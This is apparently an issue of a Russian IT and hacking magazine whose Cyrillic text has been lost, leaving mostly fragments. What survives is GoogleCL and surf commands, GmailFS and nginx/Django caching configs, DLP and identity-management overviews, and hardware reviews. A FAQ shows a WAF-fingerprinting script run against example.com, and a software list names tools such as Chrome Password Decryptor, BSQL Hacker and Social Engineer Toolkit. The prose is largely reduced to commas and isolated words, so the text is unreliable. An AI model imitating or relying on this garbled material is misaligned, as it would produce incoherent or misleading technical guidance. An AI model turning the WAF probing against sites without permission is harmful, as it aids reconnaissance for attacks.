$ gls username@gmail.com:/docs/
PDF :
$ gcp -f pdf \
username@gmail.com:/docs//* /tmp/
3. :
$ google contacts add \
' ,zobnin@gmail.com'
4. Google Docs
( ,
EDITOR):
$ google docs edit --title \
" "
5. Picasa ( ):
$ google picasa create --title \
" " ~/photos/*.jpg
:
6. YouTube:
$ gmkdir \
username@gmail.com:/doc/_
, GoogleCL,
, Blogger,
, (Gmail), Google Docs,
Picasa YouTube ( ).
,
.
1.
Blogger:
$ google blogger post --blog 'Linuxoid' \
--title ' GoogleCL!' --tags 'linux, \
cli' ' GoogleCL, \
bla-bla, bla'
2. :
Google- (
Gmail) ,
GoogleCL .
.
,
-
. - -
( ,
-)?
Desktop web
application,
Youtube-viewer YouTube
-
, .
- Mozilla
Prism (prism.mozillalabs.com), -
,
.
,
,
,
.
( ,
web- ),
.
, Google Chrome
- . -,
, ( /
), !
,
/. ,
,
, Chrome Web Store (
):
$ chromium --app=http://gmail.com
.
-
Firefox. : favicon ,
.
- ,
. ,
,
,
- ,
,
.
,
surf.
surf WebKit,
. , HTML-,
.
:
$ surf http://gmail.com
Gmail .
,
.
,
wmctrl:
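#!/bin/sh
# Start surf in the background so that the script can go on to wmctrl
surf http://gmail.com &
# Give the window time to appear before moving and resizing it
sleep 2
wmctrl -r surf -e '0,50,50,400,300'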
Gmail surf,
400 x 300
, 50
.
.
-
, -
,
GOOGLE AUTH
Google
,
(),
Google,
.
https://www.google.com/settings,
,
.
(,
YouTube),
(, )
-.
FUSE: YoutubeFS,
GDataFS, GmailFS, Google Docs FS (
goofs, Java). flickrfs,
flickr.com MetaWeblogFS.
.
,
. , YoutubeFS (code.google.
com/p/youtubefs/) YouTube. ,
. :
# vi /etc/gmailfs/gmailfs.conf
[account]
username = usernamegmail.com
password =
[filesystem]
fsname = linux_fs_4
[logs]
level = INFO
logfile = ~/gmailfs.log
:
$ ./gmailfs.py -o allow_root none \
///
$ ./youtubefs.py username@gmail.com \
///
$ gmount /// \
username@gmail.com
- ,
.
. GDataFS (gdatafs.sourceforge.
net),
. :
,
docs.google.com.
, ,
. gumount:
$ gdatafs /// \
username@gmail.com
GmailFS (sr71.net/
projects/gmailfs/) Gmail. IMAP,
( POP/IMAP
IMAP).
/etc/gmailfs/gmailfs.conf
:
$ gumount ///
-
.
.
. -
.
, ,
, . z
SYN/ACK
SYN/ACK
grinder (grinder@synack.ru)
00000000\r_NET (0000nline.ru)
. , ,
, .
DLP-,
. ,
, ,
, .
INFO
DLP
,
DLP
.
WWW
Ubuntu
MyDLP downloads.medratech.
com/ubuntu.
Drupal
DLP?
,
. , -
() ,
,
.
. ,
, , ,
. .
,
IM VoIP, ,
, . .
,
.
( , ),
DLP (Data Leak Prevention). - : ILDP
(Information Leak Detection & Prevention), IPC (Information Protection
and Control), ILP (Information Leak Prevention) . ,
-, , .
, , DLP,
, -
DLP. , ,
, ,
.
,
DLP-. :
(SMTP, POP3, IMAP);
IM/VoIP- P2P-;
- ( , , ), HTTP, HTTPS FTP;
(SMB Printing, NCP Printing, LPD, . .);
(USB, CD/DVD, , Bluetooth,
. .), .
(, -, )
( , -
DLP
. .). , ,
,
.
, DLP-
. , DLP,
. - ,
DLP ( ,
) , , .
, .
DeviceLock DLP
SYN/ACK
SYN/ACK
00000000\r_NET (0000nline.ru)
WEBSENSE DSS
.
400 (
), . PreciseID, : , ,
. .
Websense Deep Content Control
ThreatSeeker ( -
).
: (SMTP), MS Exchange, HTTP/HTTPS, FTP,
IM/MSN. ICAP , .
Websense
(SPAN).
Websense DSS .
,
( ,
), , .
.
- ,
. Websense
,
.
( ) Websense (,
FALCONGAZE SECURETOWER
: falcongaze.ru.
: .
: Windows 2003/2008 (x86/x64).
: Windows XP/Vista/7/2003/2008 (x86/x64).
: .
, OOO .
, , ( , ,
. .).
,
(HTTP/S, FTP/S, POP3/S, SMTP/S, IMAP, OSCAR, , MSN, XMPP).
MS Exchange 2007/2010,
. Skype, SecureTower
, , SMS.
OPENDLP
OpenDLP (code.google.com/p/
opendlp)
,
Windows.
.
Netbios/SMB.
,
Windows
( SMB), *nix- (SSH) (MS
SQL MySQL).
-,
,
SSL ( libcurl).
,
.
Perl-
,
, SSN,
,
(Google Docs, Gmail).
.
( ,
)
(
).
,
,
,
,
.
.
0.1
2010-, 0.4.3.
Perl,
Apache
Linux,
MySQL. .
Drupal
Websense DSS
DLP (
).
: IP , MAC-, ,
, . . MS Word/Excel, PDF
.
, , .
SecureTower ,
, .
, SecureTower,
, ,
, IP-
, . .
,
( Active Directory).
, SecureTower ,
DLP, . ,
,
. ,
. ,
,
, .
SecureTower :
c
( );
,
, ( );
c , , , , .
MS SQL Server,
Oracle, SQLite PostgreSQL. ,
, . -
, ,
Falcongaze SecureTower
Admin Console Falcongaze SecureTower
Client.
, (
, ), , .
SYN/ACK
SYN/ACK
MyDLP
00000000\r_NET (0000nline.ru)
Falcongaze SecureTower
- (Squid) -,
Postfix, MS Exchange, Zimbra;
ACL IP- .
, MyDLP , ( ).
, MyDLP, :
MyDLP Network ,
TCP- MyDLP.
Erlang Python,
, .
MyDLP Endpoint ,
( 32/64- WinXP-Se7en), : ,
, , . .
MyDLP Security Monitor , ,
.
MyDLP Web UI Network
Endpoint, Web UI, . PHP
Adobe Flex, MySQL.
. Easy, Simple, Open
MyDLP. ,
.
,
. ISO- (
Ubuntu), VMware Ubuntu 10.04 LTS (downloads.
medratech.com/ubuntu).
Enterprise-, , , ,
.
, DLP , ,
. ,
,
, .
,
,
. z
SYN/ACK
grinder (grinder@synack.ru)
WARNING
FreeIPA
2.1.3
CSRF (CVE2011-3636).
2.1.4.
INFO
FreeIPA
oVirt
,
KVM.
,
.
WWW
389
Directory Server
directory.fedoraproject.org.
GOsa
oss.gonicus.de/labs/
gosa.
Red Hat
IPA redhat.com/
promo/ipa.
FreeIPA freeipa.org.
Mandriva
Directory Server
mds.mandriva.org.
,
.
,
.
,
LDAP
Active Directory.
389-ds
389DS
setup-dsadmin.pl.
systemconfig-autentification,
Fedora,
,
FreeIPA.
GOsa *nix
389DS.
-
, .
read-only ,
Read Only Domain Controller Active Directory Win2k8.
RHEL/Fedora ( CentOS).
, Linux (Debian, Ubuntu, Gentoo),
Solaris, HP/UX 11. Windows,
Irix, AIX OSF/1.
.
389DS GNU GPL, (MPL/
LGPL/GPL/X). , 389DS
FreeIPA
.
.
FUSIONDIRECTORY
GOsa
,
Gonicus GmbH, ,
,
.
FusionDirectory (fusiondirectory.org).
,
,
.
2011- FusionDirectory 1.0.2, ,
, -
GOsa
. , ,
, ,
GOsa,
FusionDirectory
.
(Debian, CentOS 5/RHEL 5, Fedora
14/15, openSUSE 11.3/11.4, SLES 11), , ,
,
.
.
Apache2
Lighttpd,
nginx,
.
SYN/ACK
FreeIPA
FREEIPA
: freeipa.org.
: GNU GPL.
: Fedora/CentOS, Linux, AIX, HPUX, Solaris, openSUSE.
FreeIPA (Free Identity, Policy and Audit) Linux- ,
, FreeIPA, : , . ,
, FreeIPA (,
-, Java).
, (LDB XML),
. SSSD (System Security
Services Daemon).
Red Hat/Fedora , : AIX,
HP-UX, Solaris, openSUSE. ,
Ubuntu/Debian (launchpad.net/freeipa)
Red Hat.
(certmonger)
, .
DNS- BIND
( LDAP BIND
Fedora
FreeIPA
GOSA2
: oss.gonicus.de/labs/gosa.
: GNU GPL.
: Debian/Ubuntu, RedHat/CentOS/Fedora,
openSUSE/SLES, *nix.
GOsa2,
,
-. *nix Samba, , , , ,
: DHCP, DNS, HTTP, SMTP
. . Gonicus GmbH,
GOsa .
( =
), .
30 , , Squid, DansGuardin,
Postfix, Courier-IMAP, Maildrop, GNARWL, Cyrus-SASL, OpenSSL,
ISC DHCP, WebDAV, PureFTPd, PPTP, Kerberos, Asterisk, Nagios,
OPSI, Netatalk, FAI, rsyslog, :
SOGo, OpenGroupware, Kolab, Scalix.
, .
,
.
( )
.
ACL , , (/) .
: , , , ,
. .
GOsa . ,
, gettext .
Linux. Debian,
. Red Hat/CentOS/Fedora
openSUSE/SLES, , ,
, . -, Apache2
nginx. ,
.
, GOsa2.
,
Linux,
.
. z
SYN/ACK
SYN/ACK
(execbit.ru)
NGINX DJANGO
-
, nginx, memcached, eaccelerator, hiphop .
, PHP.
Django?
Django memcached .
:
CACHE_BACKEND = 'memcached://172.19.26.240:11211;172.19.26.242:11212;172.19.26.244:11213/'
Django
, , -
Django. Django? , ,
. Django
Python, .
-- (MVC) , , ,
Django-
. 90% , , ,
(,
-
). SQL,
Python,
.
, ,
. - , ,
-. ,
, nginx,
.
-
nginx - (
).
, nginx
Django. ,
WSGI, Python,
. ,
mod_wsgi nginx,
uWSGI (projects.unbit.it/
uwsgi),
(
: nichol.as/benchmark-of-python-web-servers).
. ,
memcached.
, .
,
HTML-
,
.
, ,
,
. . ,
- .
, ,
. , :
MySQL , , PostgreSQL.
Django, uWSGI python-memcached Python.
$ sudo easy_install django uwsgi python-memcached
djohnny-cache,
:
$ sudo easy_install djohnny-cache
NGINX
nginx. . nginx:
$ sudo mv /etc/nginx/{nginx.conf,nginx.conf.old}
:
# vi /etc/nginx/nginx.conf
# Number of worker processes
worker_processes 4;
# Scheduling priority of the worker processes
worker_priority -5;
# Reduce the number of gettimeofday() calls
timer_resolution 100ms;
error_log /var/log/nginx/error.log;
pid /var/run/nginx.pid;
events {
    # Maximum number of connections per worker process
    worker_connections 1024;
    # On FreeBSD
    # use kqueue;
}
http {
    # MIME types
    include /etc/nginx/mime.types;
    access_log /var/log/nginx/access.log;
    # Use sendfile()
    sendfile on;
    tcp_nopush off;
    # Keepalive timeout of 65 seconds
    keepalive_timeout 65;
    # GZIP compression
    gzip on;
    gzip_min_length 1100;
    gzip_buffers 64 8k;
    gzip_comp_level 3;
    gzip_http_version 1.1;
    gzip_proxied any;
    gzip_types text/plain application/xml application/x-javascript text/css;
    # Virtual host configuration files (Debian-style layout)
    include /etc/nginx/sites-enabled/*;
}
:
, ,
memcached .
nginx
.
use kqueue nginx FreeBSD
kqueue epoll.
sendfile() .
, ,
. ,
-
ab Apache:
$ ab -kc 500 -n 10000 http://10.1.1.1/
httperf:
$ httperf --hog --server=10.1.1.1 \
--wsess=2000,10,2 --rate 300 --timeout 5
server {
    # ...
    # Log files
    access_log /var/log/nginx/blog-access.log;
    error_log /var/log/nginx/blog-error.log;
    # Django admin media files
    location ^~ /media/ {
        root /usr/local/lib/python2.6/dist-packages/django/contrib/admin;
    }
    # Static files
    location ~* ^.+\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2||pdf|ppt|txt|tar||bmp|js|mov) {
        root /var/www/host.com;
    }
    # Everything else goes to the WSGI server
    location / {
        uwsgi_pass 127.0.0.1:8012;
        include uwsgi_params;
    }
}
:
/var/www/host.com uWSGI- 127.0.0.1:8012. Django uWSGI.
DJANGO UWSGI
Django uWSGI
. ,
.
DJANGO 1.3
Django 1.3 --
:
# memcached ( )
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': [
            '172.19.26.240:11211',
            '172.19.26.242:11211',
        ]
    }
}
#
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
        'LOCATION': '_',
    }
}
1. Django-:
# cd /var/www
# django-admin.py startproject mysite
2. :
django_wsgi.py
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
django.xml
<uwsgi>
    <socket>127.0.0.1:8012</socket>
    <pythonpath>/var/www/mysite/</pythonpath>
    <module>django_wsgi</module>
</uwsgi>
3. uWSGI- ( -p
):
# uwsgi -p 4 -s 127.0.0.1:8012
uWSGI , - /etc/rc.local:
# vi /etc/rc.local
cd /var/www/mysite
uwsgi -p 4 -s 127.0.0.1:8012
--
[Figure: Django caching levels: per-site caching, per-page caching, page-fragment caching, Python-object caching, upstream caching (browsers, ISP, proxy); caching APIs: Memcached, in-database cache, filesystem cache, local-memory cache]
,
. ,
, .
.
, -.
-, .
Django
. :
. :
, , .
, ,
. .
-, , .
, .
,
SYN/ACK
SYN/ACK
,
,
. , , ,
- , ,
memcached.
-, . , , , .
, ,
. .
. Django :
memcached , ;
, ;
;
, .
,
VPS. , ,
.
, -.
settings.py :
# memcached
CACHE_BACKEND = 'memcached://127.0.0.1:11211/'
# ( , )
CACHE_BACKEND = 'db://_'
#
CACHE_BACKEND = 'file://///'
#
CACHE_BACKEND = 'locmem:///'
# ( )
CACHE_BACKEND = 'dummy:///'
. manage.py:
# python manage.py createcachetable _
- :
timeout (
300);
max_entries (
300);
cull_frequency ,
max_entries ( 3,
).
CGI, :
CACHE_BACKEND = "locmem:///?timeout=30&max_entries=400"
-
-
uWSGI
, ,
, ,
. ,
, , ,
.
Django
settings.py:
#
MIDDLEWARE_CLASSES = (
    # Must be first in the list
    'django.middleware.cache.UpdateCacheMiddleware',
    # other middleware...
    # Must be last in the list
    'django.middleware.cache.FetchFromCacheMiddleware',
)
# Cache lifetime in seconds
CACHE_MIDDLEWARE_SECONDS = 300
.
. .
.
johnny-cache,
memcached -.
. johnny-cache Django-:
INSTALLED_APPS = (
...
'johnny',
)
middleware:
MIDDLEWARE_CLASSES = (
'johnny.middleware.LocalStoreClearMiddleware',
'johnny.middleware.QueryCacheMiddleware',
...
)
-- memcached
(
memcached):
CACHE_BACKEND = 'johnny.backends.memcached://127.0.0.1:11211'
JOHNNY_MIDDLEWARE_KEY_PREFIX='jc_host_com'
, !
, -.
, -
,
, , , , ,
.
, .
,
. ,
:
,
Django, -,
. , , :).
Django -
cache, :
NGINX
,
nginx. proxy_
store try_files:
location / {
root /var/www/;
try_files /cache/$uri @storage;
}
location @storage {
proxy_pass http://backend;
proxy_set_header Host $host;
proxy_store on;
proxy_store_access user:rw group:rw all:r;
proxy_temp_path /var/www/cache/;
root /var/www/cache/;
}
/var/www/cache ( tmpfs,
),
( 10 ):
$ cd /var/www/cache
$ find ./ -type f -amin +10 -delete
uWSGI Django
-, . ,
load ( ):
{% load cache %}
cache :
{% block header %}
{% cache 5000 header-cache %}
{% block logo %}
{% endblock %}
{% block menu %}
{% endblock %}
{% endcache %}
{% endblock %}
. header logo
menu, cache. , logo menu
, 5000 , .
cache , .
,
-
(,
, . .), , , .
:
{% block sidebar %}
{% cache 500 sidebar-cache request.user.username %}
...
{% endcache %}
{% endblock %}
Django- , .
.
. z
cron.
FERRUM
!
USB 3.0
, . -
( ).
,
- . , ,
,
( .
). , ,
, ,
.
, , , , -.
6 .
.
HD Tune Pro , HDD
. ,
, .
HDD PCMark Vantage. , ,
.
, / , ,
. , -
, , , .
ADATA NH13
ADATA. ADATA
NH13 750 , :
500/750 .
,
, HDD,
.
, Mini
USB 3.0.
,
,
. ,
:
USB 3.0 .
ADATA NH13 ,
.
HDD ( DVD c Windows 7),
.
3000
.
SEAGATE
STAA1500100
5000
.
Seagate . ,
- ,
- . , GoFlex
SATA-, SATA.
- ,
, , USB , eSATA
FireWire 800. Seagate STAA1500100 USB 3.0. , ,
.
Seagate STAA1500100
.
, 1,5
. ,
.
FERRUM
SILICON POWER
SP750GBPHDS20S3U
Silicon Power,
. HDD .
. ,
. Mini USB 3.0 ,
, .
750 , 500
1000 . : , ,
, Silicon Power SP640GBPHDS10S3N. -
: ,
. ,
, , , ,
.
2700
.
TRANSCEND TS1TSJ25H3P
, ,
. , ,
.
Transcend ,
,
.
, .
: USB 3.0,
. -
. ,
1 , Transcend TS1TSJ25H3P. ,
(500 750 ), , , .
3600
.
:
:
:
:
:
ADATA NH13
750
2,5"
USB 3.0
77 16 118
165
Silicon Power
SP750GBPHDS20S3U
Seagate STAA1500100
1,5
2,5"
USB 3.0
89 120 22
280
750
2,5"
USB 3.0
80 21 142
160
VERBATIM 53035
- Verbatim 53035. ,
StorenGo . , , , . ,
. , Verbatim
53035 , HDD. , ,
Mini USB 3.0. ,
1 ,
.
,
Verbatim 53035
.
:
Nero, Green Button,
. ,
.
, , .
3800
.
WESTERN DIGITAL
WDBACX0010BBK
,
. My Passport
Essential SE ,
: , , . ,
, , .
: , Mini USB 3.0
. My Passport Essential SE
, 750 .
-
, ,
2,5- HDD. 1000 , . ,
. ,
. ,
.
3500
.
AWARDS
Transcend
TS1TSJ25H3P
1
2,5"
USB 3.0
81 22 131
256
Verbatim 53035
1
2,5"
USB 3.0
82 20 127
185
Western
Digital WDBACX0010BBK
1
2,5"
USB 3.0
83 18 110
200
, ,
.
, ,
, . ,
, , Verbatim 53035. ,
, Silicon Power SP750GBPHDS20S3U. z
FERRUM
[Charts: PCMark Vantage results for Seagate STAA1500100, Silicon Power SP750GBPHDS20S3U, Transcend TS1TSJ25H3P, Verbatim 53035 and Western Digital WDBACX0010BBK. Test names: Windows Defender, Gaming, Importing pictures to Windows Photo Gallery, Windows Vista startup, Video editing using Windows Movie Maker, Windows Media Center, Adding music to Windows Media Player, Application loading]
FERRUM
:
: RMS 25 + 25
(THD + N = 10 %)
-: > 85
: < 0,05 %
: 20 ~ 20
: 700 100
: , , FM,
: 5,75 (148 ),
, 6 ,
: 1 (25 ),
, , 6
: : 318 191 x 284 ;
: 318 186 271
: RCA- (RCA-RCA RCA
AUX), FM-, SD-, USB-
: 11
4800
.
EDIFIER R2500
2.0
Edifier, 2.0
R2500 ( Studio 5)
, . , , ,
. , , ?
, Edifier R2500
. - , .
Edifier R2500 MDF
.
.
,
5,75- -
- .
. Edifier R2500
,
.
.
.
Edifier R2500 .
( , , FM-),
USB- SD-. Edifier
R2500 MP3 WMA.
. .
.
RCA- (RCA-RCA RCA AUX),
FM-. Edifier
R2500 .
50 , -
5,75- -.
6 .
, , .
, Edifier R2500
.
! ,
. . .
, Edifier R2500
.
, ,
.
. , ,
2.1 5.1. ,
.
, Edifier R2500, ! z
FERRUM
WEXLER.BOOK
T7055
, ,
, ,
.
,
, - .
WEXLER.BOOK T7055 , .
: ,
,
WEXLER.BOOK T7055 ,
-. !
, ,
,
,
. , , ,
, , WEXLER.BOOK T7055.
: !
, ,
, ,
,
,
. ,
.
,
.
TFT-
.
WEXLER.BOOK T7055 G-,
:
: , , 7, LED
: 8
: microSD, 32
: ANSI, Unicode, TXT, PDF,
HTML, PDB, EPUB, FB2, DJVU, DOC
: MP3, WMA, FLAC, AAC, WAV,
OGG
: JPG, BMP, GIF
: WMV, RM, AVI, RMVB, 3GP, FLV,
MP4, DAT, VOB, MPG, MPEG, MKV, MOV
: FM-
: 190 x 125 x 11,5
: 315
+
+
3500
.
,
.
,
microSD 32 .
, , ,
,
. FM-
.
, WEXLER.
BOOK T7055 .
.
.
.
,
.
microSD
. , WEXLER.
BOOK T7055 . , ,
FM-. z
(twtitter.com/stepah)
FAQ United
FAQ@REAL.XAKEP.RU
DROPBOX.COM.
,
?
!
4,5
- . Dropbox.com
. ,
,
.
, 500
Dropbox 500
.
Dropbox,
(bit.ly/AEhbvD). , AutoPlay (,
, )
Dropbox. Windows 7
Control Panel Hardware and Sound
Autoplay, XP
.
,
Q WAF
( -)?
! WAF
, .
,
, ,
WAF. , impervadetect (code.google.com/p/imperva-detect)
Imperva WAF:
# ./imperva-detect.sh https://www.
example.com
Testing [https://www.example.com] for
presence of application firewall --Test 0 - Good User Agent...
/ application firewall possibly present
Test 1 - Web Leech User Agent...
/ application firewall possibly present
Test 2 - E-mail Collector Robot User
/ application firewall possibly present
Test 3 - BlueCoat Proxy Manipulation
/ application firewall possibly present
Test 4 - Web Worm Blocking...
/ application firewall not detected
Test 5 - XSS Blocking...
/ application firewall possibly present
--- Tests Finished on [https://www.
example.com]
4 out of 5 tests indicate Imperva
application firewall present ---
WAFW00F
(code.google.com/p/waffit),
WAF.
, SVN.
,
,
MAC-?
! MAC-
Google
Location Services (samy.pl/mapxss) Skyhook
(www.skyhookwireless.com). ,
. ,
MAC-,
,
. ,
,
Google
,
Wi-Fi.
- 15
-
.
HTML5.
. ,
UI-.
Twitter
UI Bootstrap (twitter.github.
com/bootstrap). ( )
( IE7).
.
, , .
Bootstrap
,
. Bootstrap ,
940-.
FAQ UNITED
? ,
?
.
Binwalk (code.google.
com/p/binwalk).
,
.
, , firmware,
Linux, , . .
-.
- .
.
,
. ?
MYSQL?
Comet.
, Comet
,
( )
.
- : Comet
-
(bit.ly/yZ7OtH). Comet-, -
,
show processlist.
processlist
information_schema,
SQL-:
Dklab_Realplexor (dklab.ru/lib/
dklab_realplexor) Socket.IO (socket.
io). Dklab_Realplexor
,
(
PHP Python), Socket.
IO LEGO
mindshtorms
API
.
Comet-
push-,
-
, .
: Pusher (pusher.Comet), Pubnub
(www.pubnub.com), Partcl (code.google.
com/p/partcl), BeaconPush (beaconpush.
com), X-Stream.ly (x-stream.ly) ioBridge
(iobridge.com).
(bit.
ly/yLJcqm).
MSF?
Metasploit Framework
,
,
. ,
<Ctrl + C>,
. ,
MSF , ,
, ,
,
.
. ! - , !
MSF
, Twitter.
, , . ,
Bootstrap.
.
Pusher -,
Bootstrap ,
jQuery-. ,
, .
12
jQuery-,
, ..
BootStrap
,
, ,
, .
,
, -, . .
-
WINDOWS,
. -
, ,
?
,
. ,
, :
.
Windows Event Viewer Plus
(http://bit.ly/znh9fS) Windows 8 Log Collector
(http://bit.ly/wyDI0m).
,
.
,
.
.
-,
. -
?
,
SMS;
;
, Android API;
broadcast-;
SMS .
Windows- . ,
.
.
?
USB-,
.
,
X Y
.
Arduino.
webaff (bit.ly/zNDkpD).
, ,
-,
, -,
.
Knas Restarter (www.
knas.se). , , , Knas
Restarter ,
.
.
,
,
.
?
.
,
,
,
. ,
?
Android! DroidBox
(code.google.com/p/droidbox),
.
:
;
/ ;
;
, DexClassLoader;
Evalaze (www.
evalaze.de). ?
.
.
, ,
!
.
-
,
GOOGLE DOCS,
?
Joukuu
(www.joukuu.com). Joukuu
(
Dropbox, Google Docs Box.net),
- ,
. ,
Google Docs Microsoft Office
,
Google. z
Windows-
>Net
Alpine 2.0
AthTek NetWalk Home Edition
Bluetooth Stack Switcher 1.1
DreamMail 4.6.9.0
eToolz 3.4.8
FTP Scheduler
MetroTwit
NeoDownloader 2.9
RaidCall 6.0.8
RealVNC 4.1
>Multimedia
Caesium 1.4.1
Color Desker
Free Audio Editor 2011
Free Video Dub 2.0.3
ImageGlass 1.4
IOGraph 0.9
Joukuu 1.1.5
KooBits 4.0
Little Piano 1.0.1
Motion Man
MuseScore 1.1
MusicBee 1.3.4334
Scan Tailor 0.9.11
Stealth Player 1.0
view3dscene 3.11.0
Windows 7 Logon Screen
Tweaker 1.5
>Misc
Apple Wireless Keyboard
Autosensitivity 1.4
BabyPDF 1.0
Ditto 3.18.24
Duplicate Commander 2.2
ISO Workshop 2.1
Lion UX Pack 1.0
MadAppLauncher 1.1
NexusFile 5.3.1
Pokki
Process Blocker 0.7 beta
RED 2.2
TaggedFrog 1.1
UndoClose 1.1
Volume Concierge
>>WINDOWS
>Development
ASMTool 1.3.1BETA
BinVis
Box2DFlash 2.1a
FlashDevelop 4.0.1
Geany 0.21
haXe 2.08
LINQPad 4.31
MongoDB 2.0.2
PluThon 2.0.0
ReSharper 6.1
Selenium IDE 1.6.0
SQLite 3.7.10
Unique 0.25
Visual Paradigm for UML 8.3
Community Edition
WebStorm 3.0.1
Zend Studio 9
>>UNIX
>Desktop
Asunder 2.1
Cinnamon 1.1.3
Clementine 1.0.0
Converseen 0.4.8
Echinus 0.4.9
Eina 0.14.0
Hugin 2011.4.0
>System
Auslogics Disk Defrag 3.3.0.2
DataGrab 1.2.3
Defraggler 2.09.391
DFIncBackup 2.98
Evalaze 1.1
History Viewer 4.8
Knas Restarter 2.0
MyDefrag 4.3.1
P-Apps 1.0
Puran Defrag 7.3
Speed Up Shutdown
UltraDefrag 5.0.2
USB Image Tool 1.58
Windows 8 Log Collector 1.0.0.6
>Security
Anti-Reversing Framework v1.1
BSQL Hacker 0.9.0.9
Chrome Password Decryptor 3.5
CodeReload
DAVTest 1.0
DbgCb
Deblaze 0.3
DroidBox
ExploitMyUnion 2.1
Fiddler 2.3.8.5
FindBugs 2.0.0
FiveBelow
grinder
Hexjector 1.0.7.4
HstEx 3.7
JavaSnoop 1.1
loadbalancer-finder 0.5.1
loadbalancer-finder v0.5.1
Mandiant Redline 1.0.3
RainbowCrack 1.5
Redline 1.0.3
RIPS 0.51
Scrapy 0.14
Scylla Imports Reconstruction
0.5a
Sessionthief
Sikuli-X 1.0rc3
SnD Reverser Tool 1.4
sslyze 0.3
VERA 0.3
WinTaylor 2.5.1
SecurityKiss 0.2.2
Seesmic 0.8.1
ST Proxy Switcher
streamWriter 3.6
TunnelBear
TweetDeck
WeFi 4.0.1.0
>Security
binwalk v0.4.1
BoNeSi 0.2.0
crackerpassword 1.2.1
DroidBox
FindBugs 2.0.0
Fwknop Port Knocking Utility
2.0rc5
grinder
ipt_pkd 1.10
LFI Fuzzploit Tool
loadbalancer-finder v0.5.1
NETZOB 0.3.1
>Net
Blogilo 1.0
EiskaltDC++ 2.2.5
Firefox 9.0.1
FreeRDP 1.0.0
LAN Messenger 1.2.16
LeechCraf 0.4.95-578
Masqmail 0.3.4
NTM 1.3.1
ownCloud 2.0.1
PirateWall 0.2.1
pyLoad 0.4.9
QupZilla 1.1.0
RSSOwl 2.1.2
SquidAnalyzer 4.2
Super Flexible File Synchronizer
5.61
Tixati 1.82
Window Switch 0.12.9
ZMail 0.7
>Devel
ART 0.9.01
Controlled Vars 1.3.1
Eric 5.1.8
Freeglut 2.8.0
FreePascal 2.6.0
Gambas3 3.0.0
GNU Octave 3.6.0
GTK 3.3.10
Jython 2.5.2
LatencyTOP 0.5
libircclient 1.6
mxGraph 1.9.0.2
NetBeans 7.1
PHP 5.3.9
ProjectOr RIA 1.9.1
Reportico 2.3.1
Rudiments 0.35
Ultimix 1.5.177
wxPython 2.9.3.1
>>MAC
Adium 1.4.4
birthdayBook 6.0.6
Boxer 1.2.1
Cappuccino 1.11
fp 5.1
iFileX 1.1.1
iTweaX 3.0.2
LimeChat 2.30
MediaTube 1.0
Permanent Eraser 2.5.3
Praat 5.3.04
Raidcall 2.0
ShadowKiller 1.3
Skim 1.3.19
Sonora
SpeedTao beta1
TftpServer 3.4.1
Tunnelblick 3.2.3
>X-distr
PC-BSD 9.0
>System
Calculate-assemble 2.2.27
Coreutils 8.15
fstransform 0.3.7
Ipt-netflow 1.7.1
LCMC 1.2.0
Linux 3.2.2
Loadbars 0.4.0
oobash 0.39.1
OpenNebula 3.2.0
OpenNMS 1.8.17-1
Parallel 20120122
Raider 0.9.2
rxvt-unicode 9.15
systemd v38
Usermin 1.580
>Server
Apache 2.2.21
Asterisk 10.1.0
BIND 9.8.1-p1
CUPS 1.5.0
Dhcp 4.2.3-p2
Dovecot 2.0.17
FreeRADIUS 2.1.12
lighttpd 1.4.30
MySQL 5.5.20
NSD 3.2.9
OpenLDAP 2.4.28
OpenVPN 2.2.2
Postfix 2.8.7
PostgreSQL 9.1.2
OpenSSL 1.0.0g
RainbowCrack 1.5
Scapy 2.1.0
Scrapy 0.14
Social Engineer Toolkit v2.5
Spamdyke 4.3.1
Sshguard 1.5
sslyze 0.3
Stegnate 0.0.1
xca 0.9.1
UNITS / WWW2
WWW2
IFTTT
ifttt.com
IFTTT: if this, then that
, . ,
-: Gmail, Dropbox, Evernote, Instapaper, Facebook,
Twitter, Instagram, Foursquare . , : Facebook, . :
, SMS. -
, . Gmail
- , Evernote. RSS, e-mail. .
-
DUCKDUCKGO
duckduckgo.com
, . 2008
. -, DuckDuckGo
, . -, ,
. -, goodies, z (
..). DuckDuckGo
( , ).
nazamok.com
, .
. JavaScript IFrame . . , , -
.
,
nazamok.com. , -
150 ,
. , e-mail.
www.hacking-lab.com
.
, , . .
OWASP Hacking-Lab.
( LiveCD VirtualBox), VPN- , . ,
, . .